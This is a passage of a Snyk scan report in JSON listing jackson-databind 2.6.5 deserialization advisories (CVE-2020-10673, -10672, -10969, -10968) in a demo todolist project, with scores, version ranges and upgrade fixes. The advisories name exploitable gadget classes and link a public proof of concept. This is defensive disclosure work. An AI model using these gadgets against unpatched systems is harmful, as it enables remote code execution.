"GHSA-cf6r-3wgc-h863", - "GHSA-qmqc-x3r4-6v39" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-03-03T08:13:33.357434Z", - "functions_new": [ - { - "version": [ - "[,2.6.7.3)", - "[2.8.0,2.8.11.5)", - "[2.9.0,2.9.10.3)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-03-02T17:09:34Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-03-02T17:09:34Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.500842Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-560762", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2.0.0,2.6.7.4)", - "[2.7.0,2.9.10.4)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.6.7.4", - "2.9.10.4" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.0.0,2.9.10.4)" - ], - "functionId": { - "filePath": 
"com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/1645efbd392989cf015f459a91c999e59c921b15", - "title": "GitHub Commit (Master)" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2660", - "title": "GitHub Issue" - }, - { - "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "On Jackson CVE's Blog" - }, - { - "url": "https://github.com/Al1ex/CVE-2020-10673", - "title": "PoC" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.8, - "modificationTime": "2024-03-11T09:50:14.029596Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:50.167932Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:45.907430Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:14.029596Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:50.167932Z" - } - ], - "description": "## 
Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `com.caucho.config.types.ResourceRef` (aka `caucho-quercus`).\r\n\r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. 
Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Commit (Master)](https://github.com/FasterXML/jackson-databind/commit/1645efbd392989cf015f459a91c999e59c921b15)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2660)\n- [On Jackson CVE's Blog](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-10673)\n", - "epssDetails": { - "percentile": "0.81511", - "probability": "0.00775", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-10673" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - 
"GHSA-fqwf-pjwf-7vqv" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-03-19T14:36:02.644920Z", - "functions_new": [ - { - "version": [ - "[2.0.0,2.9.10.4)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-03-18T22:56:21Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-03-18T22:56:21Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:50.167932Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-560766", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2.0.0,2.6.7.4)", - "[2.7.0,2.9.10.4)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.4", - "2.9.10.4" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.0.0,2.9.10.4)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": 
"ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/592872f4235c7f2a3280725278da55544032f72d", - "title": "GitHub Commit (Master)" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2659", - "title": "GitHub Issue" - }, - { - "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "On Jackson CVEs: Don’t Panic" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.8, - "modificationTime": "2024-03-11T09:51:25.975313Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:53.920721Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:56:35.299190Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:25.975313Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:53.920721Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson 
Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.aries.transaction.jms.internal.XaPooledConnectionFactory` (aka `aries.transaction.jms`). \r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. 
Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Commit (Master)](https://github.com/FasterXML/jackson-databind/commit/592872f4235c7f2a3280725278da55544032f72d)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2659)\n- [On Jackson CVEs: Don’t Panic](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", - "epssDetails": { - "percentile": "0.81511", - "probability": "0.00775", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-10672" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-95cm-88f5-f2c7" - ] - }, - "packageName": 
"com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-03-19T15:03:20.847507Z", - "functions_new": [ - { - "version": [ - "[2.0.0,2.9.10.4)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-03-18T22:56:24Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-03-18T22:56:24Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:53.920721Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561362", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2.0.0,2.6.7.4)", - "[2.7.0,2.7.9.7)", - "[2.8.0,2.8.11.6)", - "[2.9.0,2.9.10.4)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.4", - "2.7.9.7", - "2.8.11.6", - "2.9.10.4" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.0.0,2.9.10.4)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - 
"className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2642", - "title": "GitHub Issue" - }, - { - "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.8, - "modificationTime": "2024-03-11T09:50:19.998455Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:54.582959Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:57.137266Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:19.998455Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:54.582959Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. 
The package mishandles the interaction between serialization gadgets and typing, related to gadget `javax.swing.JEditorPane`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. 
These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.7.9.7, 2.8.11.6, 2.9.10.4 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2642)\n- [Medium Article](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", - "epssDetails": { - "percentile": "0.81534", - "probability": "0.00775", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-10969" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-758m-v56v-grj4" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-03-26T16:25:31.113677Z", - "functions_new": [ - { - "version": [ - "[2.0.0,2.9.10.4)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-03-26T14:55:31Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - 
"level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-03-26T14:55:31Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.582959Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561373", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2.0.0,2.6.7.4)", - "[2.7.0,2.9.10.4)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.4", - "2.9.10.4" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.0.0,2.9.10.4)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2662", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.8, - "modificationTime": "2024-03-11T09:51:25.268261Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.8, - "modificationTime": "2024-03-11T09:53:54.576513Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:38.826605Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:25.268261Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:54.576513Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to gadget `org.aoju.bus.proxy.provider.remoting.RmiProvider` (aka bus-proxy).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2662)\n", - "epssDetails": { - "percentile": "0.81534", - "probability": "0.00775", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-10968" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-rf6r-2c4q-2vwg" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-03-26T17:09:01.709397Z", - "functions_new": [ - { - "version": [ - "[2.0.0,2.9.10.4)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-03-26T14:55:20Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-03-26T14:55:20Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.576513Z", - "socialTrendAlert": false, - 
"severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561585", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.4)", - "[2.7.0,2.9.10.4)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.6.7.4", - "2.9.10.4" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.0.0,2.9.10.4)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": 